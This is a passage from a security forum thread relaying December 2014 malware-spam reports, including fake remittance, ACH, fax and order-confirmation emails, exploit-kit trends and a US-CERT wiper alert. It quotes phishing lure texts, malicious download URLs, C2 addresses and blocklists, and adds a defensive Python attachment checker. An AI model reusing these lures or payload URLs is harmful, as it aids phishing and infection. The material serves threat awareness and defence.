The website itself has a poor reputation on Web of Trust, has been listed as being compromised on defacement archives and was also hosting a banking phish not so long ago. Should visitors attempt to login, it sends them to a shared Google Document (no Dropbox files on offer here) which is actually a “public prayer request” spreadsheet belonging to a Church:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn3.jpg
The next page is Google Drive themed and located at:
yellowpagesexpress (dot)com/cgi-bin/Secure Management/index(dot)php
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn2.jpg
As before, it asks the visitor to login with the widest possible range of common email accounts available, before sending those who enter their details to an entirely unrelated Saatchi Art investment webpage. Readers should always be cautious around pages claiming to offer up files in return for email logins – it’s one of the most common tactics for harvesting password credentials."
:fear: :mad:
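The disguise that runs through this post and the earlier ones (a .scr or .exe inside an archive, named after a PDF, JPEG or Word file, sometimes padded with dots so the real extension scrolls out of view) can be flagged at a mail gateway before anyone sees an icon. The following is an added example, not code from the thread or from any of the quoted blogs; the sample filenames are the ones reported in the posts, the zip archive is constructed in memory, and .cab/.7z attachments are only flagged for extraction because the standard library cannot open them.

```python
"""Flag mail attachments that hide an executable behind a document-looking name.

Added example (not from the quoted posts). Sample filenames mirror the ones
reported in the thread; the zip archive used as input is constructed in memory.
"""
import io
import re
import zipfile
from dataclasses import dataclass
from typing import List, Optional

# Extensions Windows will run on double-click, whatever icon the file carries.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}
# Document types the spam names its executables after ("_pdf", "_jpeg", ".doc").
DOCUMENT_TOKENS = ("pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "txt")
# Archive formats the standard library cannot open; flagged so they get extracted elsewhere.
OPAQUE_ARCHIVE_EXTS = {".cab", ".7z", ".rar"}
# Six or more dots, ellipses, underscores or spaces in a row: padding that pushes
# the real extension out of a narrow file-name column ("..._jpeg……….. (1).exe").
FILLER_RE = re.compile(r"[.\u2026_ ]{6,}")


@dataclass
class Finding:
    name: str
    reason: str


def inspect_filename(name: str) -> Optional[Finding]:
    """Return a Finding when the name is an executable dressed up as a document."""
    lowered = name.strip().lower()
    stem, dot, ext = lowered.rpartition(".")
    if not dot:
        return None
    ext = "." + ext
    if ext in OPAQUE_ARCHIVE_EXTS:
        return Finding(name, f"{ext} archive not inspected here; extract and check members")
    if ext not in EXECUTABLE_EXTS:
        return None
    if FILLER_RE.search(stem):
        return Finding(name, f"executable {ext} with filler padding hiding the extension")
    for tok in DOCUMENT_TOKENS:
        # The token must stand alone ("_pdf", ".doc", "-jpeg"), not sit inside a word.
        if re.search(rf"(^|[._ -]){tok}([._ -]|$)", stem):
            return Finding(name, f"executable {ext} named like a {tok} file")
    return Finding(name, f"bare executable {ext} attachment")


def inspect_attachment(filename: str, data: bytes) -> List[Finding]:
    """Inspect one attachment; zip archives are opened and each member name is checked."""
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            members = zf.namelist()
        return [f for f in (inspect_filename(m) for m in members) if f is not None]
    finding = inspect_filename(filename)
    return [finding] if finding else []


def build_sample_zip(member_name: str) -> bytes:
    """Constructed sample input: a zip holding one member with a fake PE header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, b"MZ" + b"\x00" * 62)
    return buf.getvalue()


if __name__ == "__main__":
    # Names taken from the posts above; archive contents constructed here.
    samples = [
        ("document7241_pdf.zip", build_sample_zip("document7241_pdf.scr")),
        ("Product Image NO. 1_jpeg" + "\u2026" * 8 + ".. (1).zip",
         build_sample_zip("Product Image NO. GXD46474848494DHW_jpeg" + "\u2026" * 8 + ".. (1).exe")),
        ("CITI-44175PI-77527.cab", b"MSCF" + b"\x00" * 32),
        ("Payment Advice_593016.doc", b"\xd0\xcf\x11\xe0"),
    ]
    for name, data in samples:
        for f in inspect_attachment(name, data):
            print(f"{name}: {f.name}: {f.reason}")
```

A macro-carrying .doc like the ones in the Dynamoo posts passes this check untouched; it only catches the icon and extension disguise, so it complements rather than replaces macro and download-URL inspection.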
AplusWebMaster
2014-12-17, 14:31
FYI...
Fake 'PL REMITTANCE' malware SPAM
- http://blog.dynamoo.com/2014/12/pl-remittance-details-ref844127rh.html
17 Dec 2014 - "This -fake- remittance advice comes with a malicious Excel attachment.
From: Briana
Date: 17 December 2014 at 08:42
Subject: PL REMITTANCE DETAILS ref844127RH
The attached remittance details the payment of £664.89 made on 16-DEC-2014 by BACSE.
This email was generated using PL Payment Remittance of Integra Finance System.
Can you please check that your supplier details are correct, if any changes are required please email back to this email address quoting your remittance reference.
The reference in the subject and the name of the Excel attachment differ from email to email, but are always consistent in the same message. There are two poorly detected malicious Excel files that I have seen [1] [2] containing two slightly different macros, which then reach out to the following download locations:
http ://23.226.229.112:8080/stat/lldv.php
http ://38.96.175.139:8080/stat/lldv.php
The file from these locations is downloaded as test.exe and is then saved to %TEMP%\VMHKWKMKEUQ.exe. This has a VirusTotal detection rate of 1/55*. The ThreatTrack report shows it POSTing to the following IP:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
This IP has been used in several recent attacks and I strongly recommend blocking it. The Malwr report also shows it dropping a malicious DLL identified as Dridex. The ThreatExpert report gives some different IPs being contacted:
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer, Germany)
The Ukrainian IP is definitely malicious, but if you wanted to establish maximum protection then I would recommend the following blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
23.226.229.112
38.96.175.139 "
1] https://www.virustotal.com/en/file/3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d/analysis/1418810946/
2] https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/1418810941/
* https://www.virustotal.com/en/file/a1699fdddc2ffcfdc55b71861b7851719cb277a655053403b1a6fec0c895a264/analysis/1418810686/
> http://blog.mxlab.eu/2014/12/17/new-fake-email-pl-remittance-details-ref1790232eg-with-malcious-xls-in-the-wild/
Dec 17, 2014
Screenshot of the XLS: http://img.blog.mxlab.eu/2014/20141205_remittance_01.gif
- https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/
> http://myonlinesecurity.co.uk/integra-finance-system-pl-remittance-details-ref6029413oh-excel-xls-malware/
17 Dec 2014
- https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/1418816542/
> https://www.virustotal.com/en/file/3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d/analysis/1418817871/
___
Fake 'Blocked ACH Transfer' SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/12/blocked-ach-transfer-spam-has-malicious.html
17 DEC 2014 - "Another spam run pushing a malicious Word attachment..
Date: 17 December 2014 at 07:27
Subject: Blocked ACH Transfer
The ACH transaction (ID: 618003565), recently sent from your online banking account, was rejected by the Electronic Payments Association.
Canceled transaction
ACH file Case ID 623742
Total Amount 2644.93 USD
Sender e-mail info@mobilegazette.com
Reason for rejection See attached word file
Please see the document provided below to have more details about this issue...
Screenshot: https://2.bp.blogspot.com/-HHVnC18smUE/VJGXBjF2VVI/AAAAAAAAF-o/yzQZ2etQFYk/s1600/ach.png
Attached is a file ACH transaction 3360.doc which isn't actually a Word 97-2003 document at all, but a malicious Word 2007 document that would normally have a .DOCX extension (which is basically a ZIP file). The current VirusTotal detection rate of this is just 1/55*. Inside this is a malicious macro... which downloads a file from:
http ://www.lynxtech .com.hk/images/tn.exe
This has a VirusTotal detection rate of just 1/54**. The Malwr report shows it POSTING to 5.187.1.78 (Fornex Hosting, Germany) and also a query to 209.208.62.36 (Atlantic.net, US). Presumably this then drops additional components onto the infected system, although I do not know what they are.
Recommended blocklist:
5.187.1.78
209.208.62.36 "
* https://www.virustotal.com/en/file/61b8edb31972b04fd2652278cca4431f498ed7930833848233da057ebf842660/analysis/1418826644/
** https://www.virustotal.com/en/file/1269bc3080617da54bdf74b04073c273109545643159883147f141742eb9fc75/analysis/1418826840/
___
Exploit Kits in 2014
- http://blog.trendmicro.com/trendlabs-security-intelligence/whats-new-in-exploit-kits-in-2014/
Dec 17, 2014 - "... Exploits targeting Internet Explorer, Silverlight, and Adobe Flash vulnerabilities were frequently used by exploit kits in the past year. The four vulnerabilities below were some of the most frequently targeted by exploit kits:
CVE-2013-0074 (Silverlight)
CVE-2014-0515 (Adobe Flash)
CVE-2014-0569 (Adobe Flash)
CVE-2014-2551 (Internet Explorer)
The most notable change in this list is the relative absence of Java vulnerabilities. Exploit kits have been removing Java because of the increasing use of click-to-play for Java applets, rendering Java a far less attractive target for exploits. The tables below show which exploits are in use by exploit kits:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-usage.png
Plugin Detection: Almost all exploit kits run some sort of software that detect the browser platform a would-be victim is running in order to determine which exploit to send to the user.
The code necessary to do this varies from one exploit kit to another, and is actually fairly complex due to the number of permutations of browsers and plugins that are possible.
Two exploit kits – Nuclear and FlashPack – use a legitimate JavaScript library, PluginDetect. This minimizes the work the creators of the exploit kit need to do, as well as providing a complete set of features. However, this also means that this library has known characteristics: this makes it more visible to security vendors looking for sites used by exploit kits. By contrast, most exploit kits write their own library to perform this task. This makes detection harder, but it also reduces the capabilities of the libraries. Many of these libraries, for example, will only function under Internet Explorer. The Magnitude exploit kit uses a third method – server-side code – too. The following table summarizes which libraries are used.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/exploit-kit-detect-b.png
Antivirus Detection: A new feature that has been added to exploit kits is the ability to detect installed security software. If certain specific security products are installed, the exploit kit will stop itself from running. Both antivirus products and virtual machine software can be targeted in this manner. This behavior is possible due to a vulnerability in Internet Explorer (CVE-2013-7331). This vulnerability allows an attacker to check for the presence of files and folders on an affected system. It was first reported to Microsoft in February 2014, but was only patched in September of the same year as part of MS14-052. The following table summarizes the products that each exploit kit detects:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-software.png
Obfuscation Techniques: Exploit kits regularly use various techniques to obfuscate their activity, but some exploit kits have added new techniques. In both of these cases, the attackers are using legitimate tools to obfuscate their files. The Angler exploit kit now uses the Pack200 format to help avoid detection. Pack200 is a compact archive format that was developed by Sun (Java’s original developers) to compress .JAR files significantly. Tools to uncompress these files are provided as part of the Java development kit, but many security products don’t support these formats (so they are unable to scan the said malicious file)...
Summary: Exploit kit developers have not been idle in the year since the collapse of the Blackhole exploit kit. They have made various improvements that help improve the capabilities of these tools. The defenses against these tools on the part of users remains the same. We highly recommend that users implement all updates to their software as is practical, since many of the vulnerabilities targeted by attackers have long been fixed by software vendors."
___
Dyre Banking Trojan - Secureworks
- http://www.secureworks.com/cyber-threat-intelligence/threats/dyre-banking-trojan/
Dec 17 2014
:mad: :fear::fear:
AplusWebMaster
2014-12-18, 14:57
FYI...
More than 100,000 'WordPress sites infected with Malware'
- https://www.sans.org/newsletters/newsbites/xvi/99#301
Dec 15, 2014 - "More than 100,000 websites running on WordPress content management system have been found to be infected with malware that attacks the devices of site visitors. Google has blacklisted more than 11,000 domains. Reports suggest that the attackers exploited a vulnerability in the Slider Revolution Premium plug-in*, which the company has known about since September 2014..."
> http://arstechnica.com/security/2014/12/some-100000-or-more-wordpress-sites-infected-by-mysterious-malware/
Dec 15, 2014
(More links at the sans URL above.)
* http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html
Dec 14, 2014
___
Fake 'AquAid Card' SPAM – doc malware
- http://myonlinesecurity.co.uk/tracey-smith-aquaid-card-receipt-word-doc-malware/
18 Dec 2014 - "'AquAid Card Receipt' pretending to come from Tracey Smith <tracey.smith@aquaid.co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... This email has what appears to be a genuine word doc attached which is malformed and contains a macro script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365 have Macros disabled by default, UNLESS you or your company have enabled them. If protected view mode is turned off and macros are enabled then opening this malicious word document will infect you, and simply previewing it in windows explorer or your email client might well be enough to infect you. Definitely DO -NOT- follow the advice they give to enable macros to see the content... The email looks like:
Hi
Please find attached receipt of payment made to us today
Tracey
Tracey Smith| Branch Administrator
AquAid | Birmingham & Midlands Central
Unit 35 Kelvin Way Trading Estate | West Bromwich | B70 7TP ...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Card-Receipt-Aquaid-malicious-email.jpg
The macros in this malicious word doc try to connect to http ://sardiniarealestate .info/js/bin.exe ..which is saved as %TEMP%\YEWZMJFAHIB.exe – this has a marginally better detection rate of 3/53*. As we have seen in so many recent attacks like this one, there are 2 versions of the malware:
18 December 2014 : CAR014 151239.doc ( 124kb) | Current Virus total detections: 2/56**
CAR014 151239.doc (130 kb) | Current Virus total detections: 2/55***
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it. Now that is very easy to say but quite hard to put into practice, because we all get emails with files attached to them..."
* https://www.virustotal.com/en/file/b73b4a11f725137a4e1aa19236a5b61671d0880edc8ba1c4d7dd22031e55a922/analysis/1418893740/
** https://www.virustotal.com/en/file/c3b99aa07e32acf3411a46dc484fbb6f9327398e207fbd1595a964084bb8a375/analysis/1418891360/
*** https://www.virustotal.com/en/file/048714ed23c86a32f085cc0a4759875219bdcb0eb61dabb2ba03de09311a1827/analysis/1418891888/
> http://blog.dynamoo.com/2014/12/malware-spam-aquaidcouk-card-receipt.html
18 Dec 2014
- https://www.virustotal.com/en/file/c3b99aa07e32acf3411a46dc484fbb6f9327398e207fbd1595a964084bb8a375/analysis/1418893415/
... Recommended blocklist:
74.208.11.204
81.169.156.5 "
___
Fake 'Internet Fax' SPAM - trojan Upatre.FH
- http://blog.mxlab.eu/2014/12/18/email-internet-fax-job-contains-url-that-downloads-trojan-upatre-fh/
Dec 18, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Internet Fax Job”, the email is sent from the spoofed address “MyFax <no-replay@ my-fax.com>” and has the following body:
Fax image data
hxxp ://bursalianneler .com/documents/fax.html
The downloaded file fax8642174_pdf contains the 21 kB large file fax8642174_pdf.exe. The trojan is known as Upatre.FH. The trojan installs itself by creating the service ioiju.exe and makes sure that it boots when Windows starts, modifies several Windows registries... At the time of writing, 1 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/745a25bcff06daf957730207c8b34704288fc5232fac81a228a5f2b4f577f048/analysis/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.185.52.226: https://www.virustotal.com/en/ip-address/192.185.52.226/information/
78.46.73.197: https://www.virustotal.com/en/ip-address/78.46.73.197/information/
UDP communications
203.183.172.196: https://www.virustotal.com/en/ip-address/203.183.172.196/information/
203.183.172.212: https://www.virustotal.com/en/ip-address/203.183.172.212/information/
___
Fake 'JPMorgan Chase' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/jpmorgan-chase-co-received-new-secure-message-fake-pdf-malware/
17 Dec 2014 - "'JPMorgan Chase & Co You have received a new secure message' pretending to come from random names @jpmorgan .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is a secure, encrypted message.
Desktop Users:
Open the attachment (message_zdm.html) and follow the instructions.
Mobile Users:
Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.
Need Help?
Your personalized image for: <redacted>
This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender.
Email Security Powered by Voltage IBE
Copyright 2013 JPMorgan Chase & Co. All rights reserved
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/You-have-received-a-new-secure-message.jpg
17 December 2014: message_zdm.zip: Extracts to: message_zdm.exe
Current Virus total detections: 11/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/25808f5afa8c93d477a954e4a0444b63fbaccac72a56dcd87d252df2606c0e19/analysis/1418844158/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
217.199.168.166: https://www.virustotal.com/en/ip-address/217.199.168.166/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.10.68.178: https://www.virustotal.com/en/ip-address/217.10.68.178/information/
- http://threattrack.tumblr.com/post/105464831328/jp-morgan-chase-secure-message-spam
Dec 18, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/af4b5b4c92d5319141774b223b9140b5/tumblr_inline_ngqwacJHwm1r6pupn.png
Tagged: JPMorgan, Upatre
___
ICANN e-mail accounts, zone database breached in spearphishing attack
Password data, other personal information of account holders exposed.
- http://arstechnica.com/security/2014/12/icann-e-mail-accounts-zone-database-breached-in-spearphishing-attack/
Dec 17 2014 - "Unknown attackers used a spearphishing campaign to compromise sensitive systems operated by the Internet Corporation for Assigned Names and Numbers (ICANN), a coup that allowed them to take control of employee e-mail accounts and access personal information of people doing business with the group. ICANN, which oversees the Internet's address system, said in a release published Tuesday* that the breach also gave attackers administrative access to all files stored in its centralized zone data system**, as well as the names, postal addresses, e-mail addresses, fax and phone numbers, user names, and cryptographically hashed passwords of account holders who used the system. Domain registries use the database to help manage the current allocation of hundreds of new generic top level domains (gTLDs) currently underway. Attackers also gained unauthorized access to the content management systems of several ICANN blogs... As the group controlling the Internet's domain name system, ICANN is a prime target for all kinds of attacks from hackers eager to obtain data that can be used to breach other targets..."
* https://www.icann.org/news/announcement-2-2014-12-16-en
** https://czds.icann.org/en
___
Worm exploits nasty Shellshock bug to commandeer network storage systems
- http://arstechnica.com/security/2014/12/worm-exploits-nasty-shellshock-bug-to-commandeer-network-storage-systems/
Dec 15 2014 - "Criminal hackers are actively exploiting the critical shellshock vulnerability* to install a self-replicating backdoor on a popular line of storage systems, researchers have warned. The malicious worm targets network-attached storage systems made by Taiwan-based QNAP, according to a blog post published Sunday** by the Sans Institute. The underlying shellshock attack code exploits a bug in GNU Bash that gives attackers the ability to run commands and code of their choice on vulnerable systems. QNAP engineers released an update in October that patches systems against the vulnerability, but the discovery of the worm in the wild suggests a statistically significant portion of users have yet to apply it. Infected systems are equipped with a secure shell (SSH) server and a new administrative user, giving the attackers a persistent backdoor to sneak back into the device at any time in the future..."
* http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
** https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061
:fear::fear: :mad:
AplusWebMaster
2014-12-19, 13:52
FYI...
Fake 'BACS payment' SPAM - XLS malware
- http://myonlinesecurity.co.uk/bacs-payment-ref9408yc-excel-xls-malware/
19 Dec 2014 - "'BACS payment Ref:9408YC' coming from random email addresses with a malicious Excel XLS attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please see below our payment confirmation for funds into your account on Tuesday re invoice 9408YC
Accounts Assistant
Tel: 01874 430 632
Fax: 01874 254 622
19 December 2014: 9408YC.xls - Current Virus total detections: 0/53* 0/55** 0/53***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cbdc93de4eded4d2df825a30f0e255136c3564738e3298f367a4557b5b360eba/analysis/1418987287/
** https://www.virustotal.com/en/file/2894ad6bef05b0bba2c6f56194f7402c5535b03c7bedda7df7065269cd52cb39/analysis/1418987903/
*** https://www.virustotal.com/en/file/f26d6bc06ae906df591432cc5a5038589358f1681a64c896c468a72beccb70c5/analysis/1418987497/
- http://blog.dynamoo.com/2014/12/malware-spam-bacs-payment-ref901109rw.html
19 Dec 2014
> https://www.virustotal.com/en/file/0a1d7d4d463d74e93bde62fb659ebfbd83a16ca5d979f7adee0fc998037d4f10/analysis/1418994768/
"... UPDATE: A further version of this is doing the rounds with an attachment which also has zero detections at VirusTotal*..."
* https://www.virustotal.com/en/file/0a1d7d4d463d74e93bde62fb659ebfbd83a16ca5d979f7adee0fc998037d4f10/analysis/1418994768/
... Behavioural information
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/
___
Fake ACH SPAM
- http://blog.dynamoo.com/2014/12/malware-spam-blocked-transaction-case.html
19 Dec 2014 - "This -fake- ACH spam leads to malware:
Date: 19 December 2014 at 16:06
Subject: Blocked Transaction. Case No 970332
The Automated Clearing House transaction (ID: 732021371), recently initiated from your online banking account, was rejected by the other financial institution.
Canceled ACH transaction
ACH file Case ID 083520
Transaction Amount 1458.42 USD
Sender e-mail info@victimdomain
Reason of Termination See attached statement
Please open the word file enclosed with this email to get more info about this issue.
In the sample I have seen, the attachment is ACH transfer 1336.doc which despite the name is actually a .DOCX file, which has a VirusTotal detection rate of 4/54*. Inside are a series of images detailing how to turn off macro security.. which is a very -bad- idea.
1] https://1.bp.blogspot.com/-zPH8zcx7OrY/VJR1Q7QBOEI/AAAAAAAAGAM/xX6zhss2M4Q/s1600/image3.png
2] https://2.bp.blogspot.com/-84ljBD1vRQg/VJR1Ru59Q2I/AAAAAAAAGAU/WcH0b9IEjII/s1600/image4.png
3] https://1.bp.blogspot.com/-vCCQWdg2iQ0/VJR1R9zpj1I/AAAAAAAAGAY/ASyT9ZXBVz8/s1600/image5.png
4] https://4.bp.blogspot.com/-cCjgc3glQpg/VJR1SDKNwjI/AAAAAAAAGAc/c_b1Rf1nawQ/s1600/image6.png
If you enable macros, then this macro... will run which will download a malicious binary from http ://nikolesy .com/tmp/ten.exe, this has a VirusTotal detection rate of 8/51** and is identified as the Dridex banking trojan."
* https://www.virustotal.com/en/file/332621eaa52f0289be55f01c6fa61dc93f541cfb52f718148958b72209e084ac/analysis/1419014981/
** https://www.virustotal.com/en/file/22015b1e727d0846fd051a1ee6bb8a243f2c8eb150d67bb8e0c82574eed694e4/analysis/1419015141/
___
Fake 'my-fax' SPAM
- http://blog.dynamoo.com/2014/12/malware-spam-no-replaymy-faxcom.html
19 Dec 2014 - "This -fake- fax spam leads to malware:
From: Fax [no-replay@ my-fax .com]
Date: 19 December 2014 at 15:37
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: http ://crematori .org/myfax/company.html
Documents are encrypted in transit and store in a secure repository...
... Clicking the link downloads a file fax8127480_924_pdf.zip which in turn contains a malicious executable fax8127480_924.exe which has a VirusTotal detection rate of 3/55*. Most automated analysis tools are inconclusive... but the VT report shows network connections to the following locations:
http ://202.153.35.133:40542/1912uk22//0/51-SP3/0/
http ://202.153.35.133:40542/1912uk22//1/0/0/
http ://natural-anxiety-remedies .com/wp-includes/images/wlw/pack22.pne
Recommended blocklist:
202.153.35.133
natural-anxiety-remedies .com "
* https://www.virustotal.com/en/file/99b5c743e203cf0fd5be7699124668be35012aaa51233742f2cd979ab43a5dcb/analysis/1419003908/
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___
Fake 'Target Order Confirmation' - malware SPAM
- http://www.hoax-slayer.com/target-order-information-malware.shtml
Dec 19, 2014 - "Order confirmation email purporting to be from Target claims that the company's online store has an order addressed to you... The email is -not- from Target. The link in the message opens a compromised website that contains malware. The Target version is just one in a series of similar malware messages that have falsely claimed to be from well-known stores, including Walmart, Costco and Walgreens...
> http://www.hoax-slayer.com/images/target-order-information-malware-1.jpg
If you use a non-Windows operating system, you may see a message claiming that the download is not compatible with your computer. If you are using one of the targeted operating systems, the malicious file may start downloading automatically. Alternatively, a message on the website may instruct you to click a link to download the file. Typically, the download will be a .zip file that hides a .exe file inside. Opening the .exe file will install the malware. The malware payload used in these campaigns can vary. But, typically, the malware can steal personal information from your computer and relay it to online scammers. The malware in this version is designed to add your computer to the infamous Asprox Botnet... This email is just one in a continuing series of malware messages that claim to be from various high profile stores, including Costco, Walmart and Walgreens. Other versions list order or transaction details, but do not name any particular store. Again, links in the messages lead to malware websites. In some cases, the malware is contained in an attached file. If you receive one of these -bogus- emails, do -not- click any links or open any attachments..."
___
Walgreens Order Spam
- http://threattrack.tumblr.com/post/105606986528/walgreens-order-spam
Dec 19, 2014 - "Subjects Seen:
Order Status
Typical e-mail details:
E-shop Walgreens has received an order addressed to you which has to be confirmed by the recipient within 4 days. Upon confirmation you may pick it in any nearest store of Walgreens.
Detailed order information is provided here.
Walgreens
Malicious URLs:
rugby-game .com/search.php?w=ZT5EpruzameN92MeSlvI09DbnfrIhx1yqu3wrootEpM=
Malicious File Name and MD5:
Walgreens_OrderID-543759.exe (39CEBF3F19AF4C4F17CA5D8EFB940CB6)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/834af3262758a5dc4d3189db0af8a91d/tumblr_inline_ngu2ovU7f51r6pupn.png
Tagged: Walgreens, Kuluoz
___
Ars was briefly hacked yesterday; here’s what we know
If you have an account on Ars Technica, please change your password today..
- http://arstechnica.com/staff/2014/12/ars-was-briefly-hacked-yesterday-heres-what-we-know/
Dec 16 2014 - "At 20:00 CT on December 14, an Internet intruder gained access to one of the Ars Web servers and spent the next hour attempting to get from the Web server to a more central machine. At 20:52, the attempt was successful thanks to information gleaned from a poorly located backup file. The next day, at 14:13, the hacker returned to the central server and replaced the main Ars webpage with a defacement page that streamed a song from the band Dual Core... "All the Things"... by 14:29, our technical team had removed the defaced page and restored normal Ars operations. We spent the afternoon changing all internal passwords and certificates and hardening server security even further. Log files show the hacker's movements through our servers and suggest that he or she had the opportunity to copy the user database. This database contains no payment information on Ars subscribers, but it does contain user e-mail addresses and passwords. Those passwords, however, are stored in hashed form (using 2,048 iterations of the MD5 algorithm and salted with a random series of characters). Out of an excess of caution, we strongly encourage all Ars readers - especially any who have reused their Ars passwords on other, more sensitive sites - to change their passwords today. We are continuing with a full autopsy of the hack and will provide updates if anything new comes to light..."
:fear::fear: :mad:
AplusWebMaster
2014-12-21, 14:59
FYI...
Targeted Destructive Malware - Alert (TA14-353A)
- https://www.us-cert.gov/ncas/alerts/TA14-353A
Last revised: Dec 20, 2014 - "Systems Affected: Microsoft Windows
Overview: US-CERT was recently notified by a trusted third party of cyber threat actors using a Server Message Block (SMB) Worm Tool to conduct cyber exploitation activities recently targeting a major entertainment company. This SMB Worm Tool is equipped with a Listening Implant, Lightweight Backdoor, Proxy Tool, Destructive Hard Drive Tool, and Destructive Target Cleaning Tool.
SMB Worm Tool: This worm uses a brute force authentication attack to propagate via Windows SMB shares. It connects home every five minutes to send log data back to command and control (C2) infrastructure if it has successfully spread to other Windows hosts via SMB port 445. The tool also accepts new scan tasking when it connects to C2*. There are two main threads: the first thread calls home and sends back logs (a list of successful SMB exploitations), and the second thread attempts to guess passwords for SMB connections. If the password is correctly guessed, a file share is established and file is copied and run on the newly-infected host...
Destructive Hard Drive Tool: This tool is a tailored hard-drive wiping tool that is intended to destroy data past the point of recovery and to complicate the victim machine’s recovery. If the CNE operator has administrator-level privileges on the host, the program will over-write portions of up to the first four physical drives attached, and over-write the master boot record (MBR) with a program designed to cause further damage if the hard drive is re-booted. This further results in the victim machine being non-operational with irrecoverable data (There is a caveat for machines installed with the Windows 7 operating system: Windows 7 machines will continue to operate in a degraded state with the targeted files destroyed until after reboot, in which the infected MBR then wipes the drive.) If the actor has user-level access, the result includes specific files being deleted and practically irrecoverable, but the victim machine would remain usable.
Destructive Target Cleaning Tool: This tool renders victim machines inoperable by overwriting the Master Boot Record. The tool is dropped and installed by another executable and consists of three parts: an executable and a dll which contain the destructive components, and an encoded command file that contains the actual destruction commands to be executed.
... *summary of the C2 IP addresses:
203.131.222.102 Thailand...
217.96.33.164 Poland...
88.53.215.64 Italy...
200.87.126.116 Bolivia...
58.185.154.99 Singapore...
212.31.102.100 Cyprus...
208.105.226.235 United States..."
(More detail at the us-cert URL above.)
- http://arstechnica.com/security/2014/12/malware-believed-to-hit-sony-studio-contained-a-cocktail-of-badness/
Dec 19 2014
> http://cdn.arstechnica.net/wp-content/uploads/2014/12/c2-ip-addresses.png
___
Fake FedEx SPAM – malware
- http://myonlinesecurity.co.uk/fedex-postal-notification-service-malware/
20 Dec 2014 - "'Postal Notification Service' pretending to come from FedEx with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Fedex-Postal-Notification-Service.jpg
20 December 2014 : notification.zip: Extracts to: notification_48957348759483759834759834758934798537498.exe
Current Virus total detections: 1/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an unknown file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/777771b8483ce8a8503ed4cdd86d425c3088c17fa7794512913751d48421a860/analysis/1419076775/
"Package Delivery" Themed Scam Alert
- https://www.us-cert.gov/ncas/current-activity/2014/12/19/FTC-Releases-Package-Delivery-Themed-Scam-Alert
Dec 19, 2014
> http://www.consumer.ftc.gov/blog/package-delivery-scam-delivered-your-inbox
